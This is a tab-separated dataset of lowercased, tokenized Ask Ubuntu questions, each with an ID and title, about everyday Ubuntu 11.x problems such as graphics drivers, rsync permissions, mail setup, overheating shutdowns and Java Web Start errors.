91717	brightness control does n't work on a toshiba satellite l750 with a geforce gt550	i 'm trying to control the brightness of my notebook 's screen using nvidia x server but the changes only persist for a few seconds , then turns back to the default settings . **i 've already tried all i 've found on the internet about this problem ( xorg.conf , grub ) . also have tried changing the brightness from the terminal but it does n't even recognize the device . $ sudo setpci -s 00:02.0 f4.b=20 setpci : warning : no devices selected for `` f4.b=20 '' . this is very frustrating because my battery does n't last as long as it does on windows . my notebook is a toshiba satellite l750 with geforce gt550 . $ lspci | grep nv 01:00.0 vga compatible controller : nvidia corporation device 0dec ( rev a1 ) 01:00.1 audio device : nvidia corporation gf108 high definition audio controller ( rev a1 )
91720	gnu emacs ca n't work on x11 and crashes with a message `` font `ubuntu mono 13 '	i got an gnu emacs ' problem , it ca n't work on x11 and crashes with a message `` font `ubuntu mono 13 ' is not defined '' but it works fine without x , more xemacs can run without problem , gnu emacs is a version 23.2.1 and xemacs is a [ version 21.4.22 ; august 2010 ] i saw the kotnik 's post ont the 2011-11-21 22:45:49 and my problem is not related with these ttf-ubuntu-font-family as they are installed and it makes no help then i have no .emacs file and .emacs.d/ folder is empty . the problem seems to be related with my user 's profile cause it works fine with an other user 's profile on the same system ( the .emacs.d/ folder on that account is the same than mine .
91723	firefox is really slow . could my power supply or ubuntu be the cause for this ?	i have installed ubuntu 11.10 long time ago and since then i was experiencing graphic performance regressions . with updates some things got better , others remained the same . things that remained the same are ff related . i have noticed that sometimes ff is very choppy , and sometimes very smooth . i could n't figure out why that happened . but i do remember that with the os upgrade i also did a hardware upgrade ( mb , cpu , gpu , ram , hdd ) but left the power supply ( 4.5 year old ) the same . my configuration follows : psu 350w mb gigabyte m68mt-s2 athlon ii x2 240 geforce 210 1 ram 2gb x2 sata hdd ( sums to ~400 gb ) 1 dvd rw so my question is : should i suspect ubuntu for the performance regression or my power supply ?
91724	load configuration from xml ( xfconf )	i 'm trying to make an app to switch your xfce4-panel 's layout between 3 layouts . i applied those layouts and copied the xml file where xfconf stores its configuration for the panel . the general idea was that i could just remove the old file and copy over the new one . only , that did n't work out so well . something appears to be preventing me from changing the xml files without the use of xfconf-query . i could just reset the panels every time , let the script set the values to how they should be , and restart the panel , but the configuration files are a bit big to do all that ( i 'm also experiencing a few problems with the content of the panel when using xfconf-query ) . so basically i want to know if there 's a way to just apply the configuration of the whole xml file . whether it 's by killing some processes and quickly copying the files over , or by using something that automatically parses the xml file and sets all the values with xfconf-query . i 'm using python ( combined with bash ) if someone knows some kind of class that can do it .
91725	dual boot ubuntu & mac	i have ubuntu 11.10 installed . just installed mac os x , updated grub , which generates 2 mac entires ( 32bit & 64bit ) . but when i try booting from these , it just restarts . i suppose i need efi grub ? which i tried installing . but i think , the efi partition needs to be the first partition ? i currently have it like :
91727	myunity configuration not working in 11.10	myunity / compizconfig with unity plugin does n't seem to be working anymore on fresh installations of ubuntu . i did some recent ubuntu installations on a couple of machines and when trying to modify things like launcher icon size / behavior etc . using myunity / compizconfig , the changes do n't seem to be applied anymore , they just stay at default .
91731	application lens installend but missing in dash	i have a very strange problem : the `` applications '' lens does not appear in unity dash . the unity-lens-application and unity-places-applications packages are installed , i tried also unity -- reset but that did n't help . on the other hand , other users on the same machine have it working . i thought it should depend from some messed up configuration so i tried to find something out of place in gconftool . obviously also that was useless . since i do n't want to completely reset the account ( too much configs in place ) , i 'd like to heare some suggestions ( anything can help ) . thanks !
91734	how do i bind a zfs pool to a lxc container ?	i 'm using ubuntu server 11.10 oneric , kernel 3.0.0-14-server . i installed zfs from ppa and created zpool and mounted it at /zfstankdir . then i installed lxc and created ubuntu container . now i want to bind /zfstankdir to /mycontainer/rootfs/zfstankdir so i did it in host machine through /etc/fstab /zfstankdir /mycontainer/rootfs/zfstankdir none defaults , bind 0 0 but in lxc container i see content of the /zfstankdir mount point directory instead of zpool content . question is : how to bind to container content of zpool ?
91736	reduce network utilization disable update manager and so on	i am using ubuntu 11.10 on a connection that is limited to only 1 gb per month . normally this should be enough for my use , but ubuntu is eating up the bandwidth ) . one reason i think is the update manager . how can i disable that one to make no automatic package list updates anymore ? and which other standard functions might eat my bandwidth ?
91739	how do i get ubuntu to ignore power button presses ?	i 've got a small media server that sits under my tv , and it runs ubuntu 11.04 desktop x64 with xbmc on top . i 've got a problem in that unknowing users / visitors occasionally press the power button 'just to see what happens ' . ubuntu dutifully intercepts this and either sleeps or halts . this is really annoying . one possible option is to just disconnect the power button from the motherboard , as i 've done with the reset button . however , i 'd still like to be able to power it back on if i choose to halt it myself , for whatever reason , or if it completely locks up . how can i get ubuntu to effectively 'ignore ' people randomly prodding at the power button while it 's turned on ?
91740	how to move all files in current folder to subfolder ?	i am at the path : /myuser/downloads/ and i create a sub folder : /myuser/downloads/new now i want to move all files and folders/sub-folders in the downloads folder to the sub-folder . how can i do this ? i tried : mv -r * . * new/ but move does n't take the -r switch it seems .
91748	is switching to raster graphic system speeding up kde4 ?	while searching for methods to optimize my kde4 installation on ubuntu 10.04 lts , someone suggests the raster graphics system instead of the default . change the default paramter in startkde4 script to plasma-desktop -graphicssystem raster i 've totally no idea what 's better and the current one using on my system . how should i find it out , and compare them ? ( i 'm not using ati 's driver for now , is that xv or opengl ? )
91750	two finger scroll not working on a samsung rv510	the touchpad on my samsung rv510 does n't let me use two finger scroll on ubuntu . i 'm very new to using linux so could you please give me instructions that you would give to a child . i 've tried various terminal commands etc that other people have suggested but i ca n't seem to get it working . any help with be greatly appreciated !
91755	amarok in kde and banshee in gnome	i want to do something to prevent banshee from start in kde ( even accidentally ) edit : i want to do somehow lock the banshee in kde . ( /bin/banshee be only valid in gnome . )
91758	kubuntu muon package manager stop working	i have kubuntu today after updating the muon package manager stuck at 64 % so i closes it . and after that when i try to update or reinstall or install software the manger stuck . so how can i reinstall the muon package manger from terminal ? ? i try sudo apt-get install muon and i get this messege reading package lists ... done building dependency tree reading state information ... done muon is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libopencv-dev : depends : libopencv-core-dev ( = 2.3.1-4ppa1 ) but it is not going to be installed depends : libopencv-ml-dev ( = 2.3.1-4ppa1 ) but it is not going to be installed depends : libopencv-imgproc-dev ( = 2.3.1-4ppa1 ) but it is not going to be installed depends : libopencv-video-dev ( = 2.3.1-4ppa1 ) but it is not going to be installed depends : libopencv-objdetect-dev ( = 2.3.1-4ppa1 ) but it is not going to be installed depends : libopencv-gpu-dev ( = 2.3.1-4ppa1 ) but it is not going to be installed depends : libopencv-highgui-dev ( = 2.3.1-4ppa1 ) but it is not going to be installed depends : libopencv-calib3d-dev ( = 2.3.1-4ppa1 ) but it is not going to be installed depends : libopencv-flann-dev ( = 2.3.1-4ppa1 ) but it is not going to be installed depends : libopencv-features2d-dev ( = 2.3.1-4ppa1 ) but it is not going to be installed depends : libopencv-legacy-dev ( = 2.3.1-4ppa1 ) but it is not going to be installed depends : libopencv-contrib-dev ( = 2.3.1-4ppa1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . so what to do , i need to reinstall it because it not working ~ $ sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of libopencv-dev : libopencv-dev depends on libopencv-core-dev ( = 2.3.1-4ppa1 ) ; however : package libopencv-core-dev is not installed . libopencv-dev depends on libopencv-ml-dev ( = 2.3.1-4ppa1 ) ; however : package libopencv-ml-dev is not installed . libopencv-dev depends on libopencv-imgproc-dev ( = 2.3.1-4ppa1 ) ; however : package libopencv-imgproc-dev is not installed . libopencv-dev depends on libopencv-video-dev ( = 2.3.1-4ppa1 ) ; however : package libopencv-video-dev is not installed . libopencv-dev depends on libopencv-objdetect-dev ( = 2.3.1-4ppa1 ) ; however : package libopencv-objdetect-dev is not installed . libopencv-dev depends on libopencv-gpu-dev ( = 2.3.1-4ppa1 ) ; however : package libopencv-gpu-dev is not installed . libopencv-dev depends on libopencv-highgui-dev ( = 2.3.1-4ppa1 ) ; however : package libopencv-highgui-dev is not installed . libopencv-dev depends on libopencv-calib3d-dev ( = 2.3.1-4ppa1 ) ; however : package libopencv-calib3d-dev is not installed . libopencv-dev depends on libopencv-flann-dev ( = 2.3.1-4ppa1 ) ; however : package libopencv-flann-dev is not installed . libopencv-dev depends on libopencv-features2d-dev ( = 2.3.1-4ppa1 ) ; however : package libopencv-features2d-dev is not installed . libopencv-dev depends on libopencv-legacy-dev ( = 2.3.1-4ppa1 ) ; however : package libopencv-legacy-dev is not installed . libopencv-dev depends on libopencv-contrib-dev ( = 2.3.1-4ppa1 ) ; however : package libopencv-contrib-dev is not installed . dpkg : error processing libopencv-dev ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libopencv-dev sudo apt-get install -f sudo dpkg -- configure -a and still same problem ... and i think getting this problem because of updating kubuntu today
91764	atd load and interval configuration	i 've been using at -q b now and batch commands recently for a project of mine . the problem is that no matter how i modify the conf file it will not take my changes into account . the exec line in /etc/init/atd.conf is as follows : exec atd -l 2.5 -b 10 i restart atd with sudo service atd restart but it 's still only running the commands every 2mn ( i thought atd default was 60s anyways ? ) . at this point i 'm not even sure the load is being taken into account either . can anyone help with this ? i 'm running ubuntu 11.10 ( 64b )
91767	what 's the best way to encrypt a flash drive ?	the title says it all . is there a good , safe , flash drive encrypt-er ?
91772	discolored lcd screen	i recently got a better screen for my computer . it 's an lcd versus a crt - the viewsonic va902b . i 'm quite satisfied with it because it 's better than the crt , but it 's a little discolored . it 's got exactly the same problem as this person , but they did n't get a good answer . i 've tried to set several things with the monitor 's buttons : auto image adjust color adjust brightness/contrast however i 'm rather a headless chicken when it comes to those things . perhaps the amplifier or something ? - search
91773	how do i secure vnc/desktop sharing ?	i have a bunch of laptops i need to set up for our support dept and i need to be able to access/monitor them at all times . the laptops run ubuntu 11.10 gnome shell 3.2 and all have the desktop sharing thing enabled along with a password . this all works , i can connect to the laptops and view them and interact with them . now , from what i 've read , that password thing ai n't the most sophisticated security measure out there so i 'm looking for a secure upgrade for this setup , preferably one that does n't need too much changes on their end . i 've read up on implementing ssh , but that is if i want to log on to a dormant account not when i want to just bomb the existing user session .
91774	is mplayer multi-threaded ?	there 's a post in mplayer 's site from 2011-03-26 , i.e . march 26 , saying that mplayer is multi-threaded . so this is several months before oneiric was released . does this mean that the stock mplayer i get from `` sudo apt-get install mplayer '' in ubuntu oneiric is multithreaded , and i do n't need to compile from svn , or compile mplayer-mt , or do anything special ?
91789	why is nacl disabled for chromium ?	i would like to test nacl with the chromium i installed from the software center , however it seems to have been disabled for an unclear reason . http : //www.ubuntuupdates.org/packages/show/378128 [ fabien tassin ] * disable nacl until we figure out what to do with the private toolchain - update debian/rules is anyone aware what this means and how it came to be that this was reason for disabling nacl for the base , the updates and even daily builds ?
91790	why ca n't i copy files to a usb drive partitioned by gparted ?	i just formatted a brand-new usb external hard drive with a single ext4 partition using gparted . i want to back up my files so i can do a fresh install of oneric on my only machine . natty mounted the new partition and i can see the `` lost+found '' directory , but i can not copy files to the drive - i get `` permission denied '' . if i ll /media , i see : drwxr-xr-x 3 root root 4096 2011-12-31 10:00 mydisk/ i have a very limited understanding of permissions , but is the lack of 'w ' permission on the `` others '' class what 's preventing me from copying my files ? i 'm tempted to try chmod o+w mydisk , but would that apply to others on a different system , or just my current one ( i need to copy files from the disk after installing oneric ) ? same question with root ownership - is that `` root '' on my current system only , or root on any system i connect the drive to ? even if my thinking is way off , why does n't gparted make the drive writable to my user account by default ?
91792	folder syncs but nothing in it syncs	i have installed ubuntu one on a computer running windows to sync files and folders . i 've added the my documents folder to ubuntu one . folder syncs but there is nothing in it . i have not mentioned this clearly . i have been trying to sync folders on windows computer . i clicked on ubuntuone add folder to add my documents folder to sync .
91798	firefox uploads images sideways	when uploading images to ebay etc firefox rotates the image sideways every time the image is portrait view , this happens immediately in the upload file dialogue box and i can not find a solution , for ebay i must be able to upload the images correctly .
91800	get rid of flat menu ( without hierarchy ) in gnome-shell	in gnome-shell , menus on the top panel are flat -- submenu is not displayed on the side , as it used to be , but is opened in the upper level : is there a way to change the behavior back ? is it hard-coded , gtk3 theme , gnome-shell theme or something else ?
91807	black screen at the booting part of ubuntu	i installed 64 bit ubuntu on my laptop but everytime i try to boot into ubuntu , i just get a purple then black screen . i have an amd dual processor and a amd radeon graphics card . please help for i am a noob at this .
91815	how to install software or upgrade from old unsupported release ?	recently i have installed an older version of ubuntu on my old machine . when ever i am trying to install any software it is giving error sudo -i apt-get install vlc the error being flagged is under below . reading package lists ... done building dependency tree reading state information ... done e : could n't find package vlc
91816	permission denied for many directories with rsync	i 'm using rsync to backup an ubuntu server server . i 'm getting a lot of permission denied messages . is there a command i can use to see exactly what directories were denied ? i could scroll back up through all the files , but that would take forever . any help would be greatly appreciated .
91818	paint tool sai pressure sensitivity does n't work	alright . here 's the situation ; i 've got my ubuntu up and running , and it 's generally working very nicely . winetricks in particular is making the transfer quite easy , as the programs that i could n't easily replace seem to operate largely without a hitch . unfortunately , one of the programs i could n't get working quite right is a digital illustration program called paint tool sai . it opens fine and the functions are all present ... except the pressure sensitivity . i suspect it 's more than likely that sai does n't know how to interpret the native wacom drivers . my paint appears to be lacking in some useful features that are part of my workflow , and gimp has n't impressed me much as a tool for illustration ; if possible i 'd prefer to use this particular program . as of current , i was considering installing the bamboo drivers into winetricks , but i 'm not in any way certain that this is sound . is this a feasible solution to this issue , or should i try another workaround ?
91819	upgraded by the book 11.04 to 11.10 . i want 11.04 back	i grub xp , ubuntu and 2 puppys ( one ram and one encrypted ) i upgraded to 11.10 and now i have ubuntu and xp only . i can probably fix this but it is a time consumer . it seems to me that 11.10 is much slower on boot up and shut down than 11.04 . i should know better than to fix something that is n't broken . is there a way to undo the upgrade to 11.10 without re-install ? thanks not complaining -just thankful for the windows exscape you guys offer .
91825	shotwell uses the correct date in events but the wrong one in the pictures folder	i am currently using shotwell 0.9.3 as my main photo organizer and i noticed that there is some sort of error when i import photos ( usually from an sd card ) . what i do is i choose file » import from folder ... and then i select my sd card and click copy photos on the dialog box . the photos are imported to the correct event , say the pictures were taken on jan 01 , 2012 and so the photos are shown under jan 01 , 2012 . what puzzles me is that when i check under ~/pictures , i could n't find the imported pictures in folder ~/pictures/2012/01/01 but instead i find them under ~/pictures/2011/12/31 which is a day earlier than when the picture was taken . is this a bug ? thanks .
91826	how do i install `` need for speed world '' ?	how do i install need for speed world ? please do n't just say `` use wine '' , i am a newbie and i need a detailed way to install it ( step by step ) . i use ubuntu 11.10 .
91829	save virtualbox vm state before logout	i 'm using oneiric with unity . i want to find a solution to automatically save the state of my virtualbox virtual machine before i logout or shutdown because i always forget to do it manually . i know i can use vboxmanage controlvm [ vmname ] savestate to save state in terminal . but how do i make ubuntu execute this command before logging out ?
91831	does hd 6450 graphics card work fine on ubuntu ?	does hd 6450 work ok with ubuntu 11.10 ? i have desktop computer and my screen is connected with dvi . i want to know should it work ok with ubuntu and proprietary drivers . and my computer has an amd apu processor , which has gpu + cpu in one . but can i be sure it uses the hd 6450 card , not the integrated gpu from cpu .
91835	can i view text files i 've synced to ubuntu one online ?	i am able to sync and see my file names online and on all my devices , but how can i simply view sync 'd text files online , or , say , on my mobile phone ( which has the ubuntu one app installed ) .
91838	rsync permission issues via ssh	i am backing up a networked server via ssh . unfortunately , i ca n't seem to figure out how to get root access to the networked server with rsync . i am using the following command to perform the backup : sudo rsync -av ubuntu @ ******* : / /media/backup1/ubuntubackup some directories come up as permission denied . once i log in through rsync , the backup just starts and there is no way to issue the sudo command . i understand that i can use the rsync daemon to get around this , but i would like to use ssh without the daemon for the sake of simplicity . does anyone know a way to accomplish this ? any help would be greatly appreciated .
91839	how to send e-mail from ubuntu server ?	what i 'm supposed to do is send emails from ubuntu . the easiest way i have found is using thunderbird and linking my real e-mail address ( abc @ hotmail.com ) to thunderbird account . i can successfully receive e-mails and download full history this way . i ca n't send e-mails , however . what i want to do is send e-mails straight from ubuntu and appear as user1 @ localhost or something similar . is that even possible ? after reading different topics about this , it seems that using a relay address is the only way . i have also installed postfix , same way as written there : how to set up a mail server ? when i was asked to choose installation type , i chose internet site . options i had : no configuration ; internet site ; internet with smarthost ; stellite system ; local only ; when asked for system mail name , i entered a website i own : some_website.com . i still have n't figured out how to send emails bia postfix but i assume that again a relay-server will be used . i 'm running ubuntu 11.10 as a virtual machine . i hope this question makes sense .
91841	random shutdowns	i 've installed ubuntu on a usb thumbdrive , to be used to backup ( image ) and partition a harddisk . i 'm currently stuck at the backup-phase of my plan , because ubuntu keeps shutting down . from my perspective , it seems that it just shuts down , almost as if i had asked it to . i do n't have any good messages in the logs , as far as i can tell , so i 'm really looking for a place to start debugging . i 've also been playing minecraft off this installation , and it seems to not like that either : the same sort of shutdowns occur , but it is n't limited to minecraft . it reminds me of a machine i saw with thermal issues , but i have no proof for this . ( that machine would shutdown within two minutes if you simply ran a while true : pass loop in python . ) first , the hardware : the machine is a lenovo t500 , running 32-bit ubuntu 11.10. uname -a : linux roy-linux-usb 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:50:42 utc 2011 i686 i686 i386 gnu/linux last messages in /var/log/xorg.0.log : [ 9861.576 ] ( ii ) power button : close [ 9861.594 ] ( ii ) unloadmodule : `` evdev '' [ 9861.594 ] ( ii ) unloading evdev [ 9861.620 ] ( ii ) video bus : close [ 9861.620 ] ( ii ) unloadmodule : `` evdev '' [ 9861.620 ] ( ii ) unloading evdev [ 9861.656 ] ( ii ) sleep button : close [ 9861.656 ] ( ii ) unloadmodule : `` evdev '' [ 9861.656 ] ( ii ) unloading evdev [ 9861.688 ] ( ii ) uvc camera ( 17ef:4807 ) : close [ 9861.688 ] ( ii ) unloadmodule : `` evdev '' [ 9861.688 ] ( ii ) unloading evdev [ 9861.708 ] ( ii ) at translated set 2 keyboard : close [ 9861.708 ] ( ii ) unloadmodule : `` evdev '' [ 9861.708 ] ( ii ) unloading evdev [ 9861.760 ] ( ii ) unloadmodule : `` synaptics '' [ 9863.434 ] ( ii ) unloading synaptics [ 9863.440 ] ( ii ) tpps/2 ibm trackpoint : close [ 9863.440 ] ( ii ) unloadmodule : `` evdev '' [ 9863.440 ] ( ii ) unloading evdev [ 9863.448 ] ( ii ) thinkpad extra buttons : close [ 9863.448 ] ( ii ) unloadmodule : `` evdev '' [ 9863.448 ] ( ii ) unloading evdev [ 9864.598 ] ( ii ) fglrx ( 0 ) : shutdown cmmqs [ 9864.599 ] ( ii ) fglrx ( 0 ) : [ uki ] removed 1 reserved context for kernel [ 9865.075 ] ( ii ) fglrx ( 0 ) : [ uki ] unmapping 8192 bytes of sarea 0x2000 at 0xb7795000 [ 9866.600 ] ( ii ) fglrx ( 0 ) : interrupt handler shutdown . [ 9872.550 ] ddxsiggiveup : closing log last messages /var/log/messages : [ 9855.198401 ] thinkpad_acpi : temperatures ( celsius ) : 85 43 35 62 27 n/a 28 n/a 35 44 60 n/a n/a n/a n/a n/a [ 9855.315474 ] init : tty4 main process ( 964 ) killed by term signal [ 9855.317930 ] init : tty5 main process ( 967 ) killed by term signal [ 9855.319500 ] init : tty2 main process ( 981 ) killed by term signal [ 9855.321669 ] init : tty3 main process ( 983 ) killed by term signal [ 9855.322777 ] init : tty6 main process ( 985 ) killed by term signal [ 9855.346869 ] init : irqbalance main process ( 1001 ) killed by term signal [ 9855.348362 ] init : cron main process ( 1004 ) killed by term signal [ 9855.351377 ] init : tty1 main process ( 1292 ) killed by term signal [ 9855.363890 ] init : plymouth-upstart-bridge main process ( 2103 ) terminated with status 1 kernel : kernel logging ( proc ) stopped . rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.1 '' x-pid= '' 821 '' x-info= '' http : //www.rsyslog.com '' ] exiting on signal 15 . that first line makes me think my temperature suspicion is right . i downloaded lm-sensors , and the output from sensors ( under cpu load of two python threads looping infinitely ) : $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +85.0°c ( crit = +127.0°c ) temp2 : +96.0°c ( crit = +100.0°c ) thinkpad-isa-0000 adapter : isa adapter fan1 : 3025 rpm temp1 : +85.0°c temp2 : +45.0°c temp3 : +36.0°c temp4 : +61.0°c temp5 : +27.0°c temp6 : n/a temp7 : +27.0°c temp8 : n/a temp9 : +37.0°c temp10 : +46.0°c temp11 : +58.0°c temp12 : n/a temp13 : n/a temp14 : n/a temp15 : n/a temp16 : n/a the machine is warm , but i would not describe it as hot . the fans are spinning , and audibly changing speed . i just purchased the laptop , and it is used .
91844	using gio in python 3	how can i access the gio module for python 3.2 ? ( i want to interface with gvfs . ) i did sudo apt-get install python3-gobject but this does not allow me to do import gio as it did in python 2.7 . is the gio module not provided with gobject in python 3 ? how do i access it ?
91847	how to kill a process when i cant kill it via the gui and kill in the terminal ?	i have some weird skype crashes today . if i try to close it via the x nothing happens . i tried to kill the process over the kde process manager ( ctrl + esc ) . i even tried to kill skype via the terminal : killall skype kill ( skypes process number ) none of the both worked . right now i got to relogin to get it working again , and it keeps crashing every 15mins . i 'm using kde 4.7 and ubuntu 11.10 .
91849	how do i get the virtual terminal to show by default on startup ?	i 've got an older system that 's resource challenged . i 've disabled/removed gdm and kdm , and removed the splash screen by editing /etc/default/grub and running sudo update-grub . gdm does n't start , and i do n't get the splash screen . however , i 'm left with checking battery state [ ok ] and i have to press ctrl+alt+f1 to get to the virtual terminal . how can i make the startup process end at tty0 ? ( i 'm running ubuntu 10.10 )
91852	openjdk-7-jdk some commands not recognized ?	i installed openjdk-7-jdk using apt-get install . however , when i type 'javac ' , the terminal says , 'bash : /usr/bin/javac : no such file or directory ' . i think the link is broken , but how can i fix it ? note : i installed openjdk-7-jdk before , but then i removed openjdk and installed sun-java . now i deleted sun-jdk and want to go back to openjdk , but javac is not recognized . i 'm using ubuntu 11.10 . edit : recognized : java ; not recognized : javac , javadoc , appletviewer , ...
91858	i want `` sync now '' button in ubuntu one	what should i do now ? there is no way i would disconnect and reconnect from ubuntu one . what an idiot !
91865	`` invisible '' icons in the launcher bar	in the launcher bar , there are `` icons '' that display a text ( `` system settings , '' `` home folder '' ) when you float the mouse over them , but they 're just black -invisible - it looks like a blank spot between the other icons , but ... they work ! this is also true when i open the system settings window - i can see some icons , but others just have text that disappears into the white background when i go to click on them ( they also work , but it 's just sorta weird ...
91869	how do i find `` system > preferences '' ?	many ubuntu instructions start with `` system > preferences '' . on ubuntu 10 there was a system menu in the upper left corner of the ui . on 11 there is no such menu . what to do ?
91870	how to get previous behaviour of alt-tab task switcher in 11.10 ?	this question was asked before : how to get previous behaviour of alt-tab task switcher in 11.10 but the accepted answer did not answer the question . the 11.10 task switcher is way to slow . it does not show all of the apps running . it only shows categories , then after a long pause it shows the instances in each category . i want to go back to the better solution in ubuntu 10.10
91875	how to show opened windows in the panel seperately on multiple monitors ?	as mentioned in the title , how to show opened windows in the panel seperately on multiple monitors ? illustration : i have 2 screens . what i 'm trying to achieve is this : let 's say i have firefox opened in screen 1 , and chrome opened in screen 2 , i would like the screen 1 panel to show firefox only , and screen 2 panel to show chrome only . however , what i got is this : any panels i add will just include every windows opened regardless of which screen they 're in . any way to solve this ? or is it even possible ? some info of my system : os : ubuntu 11.10 desktop environment : xubuntu ( because i 'm familiar with ubuntu 10.04 ) graphic card : vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) . i have another laptop which is running ubuntu 10.04lts , where this work automatically after i setup the system > administrator > nvidia x server settings . junrong @ junrong-studio-1537 : ~ $ xdpyinfo | grep -c 2 dimensions screen # 0 : dimensions : 2560x1024 pixels ( 676x270 millimeters ) resolution : 96x96 dots per inch depths ( 7 ) : 24 , 1 , 4 , 8 , 15 , 16 , 32
91879	random bursts of cpu activity	i am running a wubi installation of ubuntu 11.10 64 bit and every hour or so there is a random burst of activity where the cpu is at 100 % and i have trouble just browsing on firefox . this can last from a minute to five minutes and makes my cpu really hot . i took a htop screenshot when one of these bursts happened and it looks like the culprit is mount . so , what the hell is mount doing that needs so much cpu attention and how do i stop it ?
91885	how do i get a canon lbp5000 printer working ?	i have unsuccessfully attempted to install a canon lbp5000 printer on ubuntu 11.10 . i have attempted all possible methods to be found on the web , but nothing seems to work . my latest attempt was radu cotescu 's script from http : //radu.cotescu.com/how-to-install-canon-lbp-printers-in-ubuntu/ using the script everything appears to work as described during the installation process , but when attempting to actually print , it remains stuck in âprocessingâ ( regardless of what i attempt to print ) [ there is no additional error message ] . could anyone help me ? it would be very much appreciated !
91892	how to use gedit-latex-plugin ?	i have installed the packages texlive and gedit-latex-plugin . i see syntax highlighting for .tex files , but i do n't get any extra stuff in my gedit menus or toolbars for latex - > pdf like i expected to see , and there is n't anything resembling a latex plugin there to enable in the edit - > preferences - > plugins dialog . what am i missing ?
91894	unable to find or create trash directory	i just created an ntfs partition for windows 7 dual booting . i tried deleting a few files from a folder in the windows drive , but i get the error unable to find or create trash directory . i can create files and folders just fine , and i can delete from the command line with rm . i just ca n't delete with my context menu or with the del key . why is n't is letting me and how can i fix it ?
91897	first time using java web start in ubuntu - fatal launch exception	i 've been using ubuntu for a while and java web start applications have never `` just worked '' in the current or any prior version , so i ignored them until now . however , now i have a need to get them working in firefox . when i am on a page like this : http : //www.oracle.com/technetwork/java/demos-nojavascript-137100.html i want to be able to click on the demos as suggested and have them run . i 'm running ubuntu 11.10 with gnome 3 and/or linux mint 12 ( 64 bit ) with openjdk 6 , openjdk 7 and sun java 6 . my default is currently : /usr/lib/jvm/java-6-openjdk/jre/bin/java $ whereis javaws javaws : /usr/bin/javaws /etc/alternatives/javaws - > /usr/lib/jvm/java-6-openjdk/jre/bin/javaws here 's the error i get when i try to run a java web start application : net.sourceforge.jnlp.launchexception : fatal : initialization error : could not initialize application . at net.sourceforge.jnlp.launcher.createapplication ( launcher.java:776 ) at net.sourceforge.jnlp.launcher.launchapplication ( launcher.java:552 ) at net.sourceforge.jnlp.launcher $ tgthread.run ( launcher.java:887 ) caused by : net.sourceforge.jnlp.launchexception : fatal : initialization error : a fatal error occurred while trying to verify jars . at net.sourceforge.jnlp.runtime.jnlpclassloader.initializeresources ( jnlpclassloader.java:448 ) at net.sourceforge.jnlp.runtime.jnlpclassloader. < init > ( jnlpclassloader.java:176 ) at net.sourceforge.jnlp.runtime.jnlpclassloader.getinstance ( jnlpclassloader.java:295 ) at net.sourceforge.jnlp.launcher.createapplication ( launcher.java:767 ) ... 2 more caused by : net.sourceforge.jnlp.launchexception : fatal : initialization error : a fatal error occurred while trying to verify jars . at net.sourceforge.jnlp.runtime.jnlpclassloader.initializeresources ( jnlpclassloader.java:448 ) at net.sourceforge.jnlp.runtime.jnlpclassloader. < init > ( jnlpclassloader.java:176 ) at net.sourceforge.jnlp.runtime.jnlpclassloader.getinstance ( jnlpclassloader.java:295 ) at net.sourceforge.jnlp.launcher.createapplication ( launcher.java:767 ) at net.sourceforge.jnlp.launcher.launchapplication ( launcher.java:552 ) at net.sourceforge.jnlp.launcher $ tgthread.run ( launcher.java:887 ) here 's another example : http : //docs.oracle.com/javase/tutorial/uiswing/events/keylistener.html net.sourceforge.jnlp.launchexception : fatal : read error : could not read or parse the jnlp file . at net.sourceforge.jnlp.launcher.fromurl ( launcher.java:491 ) at net.sourceforge.jnlp.launcher.launch ( launcher.java:283 ) at net.sourceforge.jnlp.runtime.boot.run ( boot.java:199 ) at net.sourceforge.jnlp.runtime.boot.run ( boot.java:51 ) at java.security.accesscontroller.doprivileged ( native method ) at net.sourceforge.jnlp.runtime.boot.main ( boot.java:165 ) caused by : java.io.ioexception : port out of range : -2147483648 at net.sourceforge.jnlp.jnlpfile.openurl ( jnlpfile.java:255 ) at net.sourceforge.jnlp.jnlpfile. < init > ( jnlpfile.java:185 ) at net.sourceforge.jnlp.jnlpfile. < init > ( jnlpfile.java:162 ) at net.sourceforge.jnlp.jnlpfile. < init > ( jnlpfile.java:148 ) at net.sourceforge.jnlp.launcher.fromurl ( launcher.java:477 ) ... 5 more caused by : java.io.ioexception : port out of range : -2147483648 at net.sourceforge.jnlp.jnlpfile.openurl ( jnlpfile.java:255 ) at net.sourceforge.jnlp.jnlpfile. < init > ( jnlpfile.java:185 ) at net.sourceforge.jnlp.jnlpfile. < init > ( jnlpfile.java:162 ) at net.sourceforge.jnlp.jnlpfile. < init > ( jnlpfile.java:148 ) at net.sourceforge.jnlp.launcher.fromurl ( launcher.java:477 ) at net.sourceforge.jnlp.launcher.launch ( launcher.java:283 ) at net.sourceforge.jnlp.runtime.boot.run ( boot.java:199 ) at net.sourceforge.jnlp.runtime.boot.run ( boot.java:51 ) at java.security.accesscontroller.doprivileged ( native method ) at net.sourceforge.jnlp.runtime.boot.main ( boot.java:165 )
91902	my tata photon whiz modem is detected as storage device instead of a modem	my computers 's processor is pentium 4 . speed 3 gh ram 512 mb my computer 's os is ubuntu 11.10 my modem is tata photon whiz which works as a modem in addition to a storage deice in wndows xp ; but whenever i connect it in ubuntu 11.10 , it is detected only as a storage device in stead of a modem . please help me as i am very much desperate to use internet in ubuntu .
91906	add an option to global menu in ubuntu 11.10	is there any way to add logout option to top panel along with file bookmarks view go et al . ? clicking lefttop and then logout is quite a chore and i am lazy .
91909	trouble compiling a 32 bit binary on a 64 bit machine	i 'm trying to compile a c program as a 32 bit binary instead of 64 bit . i started by just adding -m32 and got some errors . googling around a little i came across a note to install ia32-libs . running apt-get install ia32-libs resulted in a notification taht it was already installed and at the newest version . there is a chain of libraries each one including the next until it fails : /usr/include/features.h:323:26 : fatal error : bits/predefs.h : no such file or directory it seems to be including 32 bit versions of the other includes /usr/include/c++/4.6/x86_64-linux-gnu/32/bits/ ... what am i missing ?
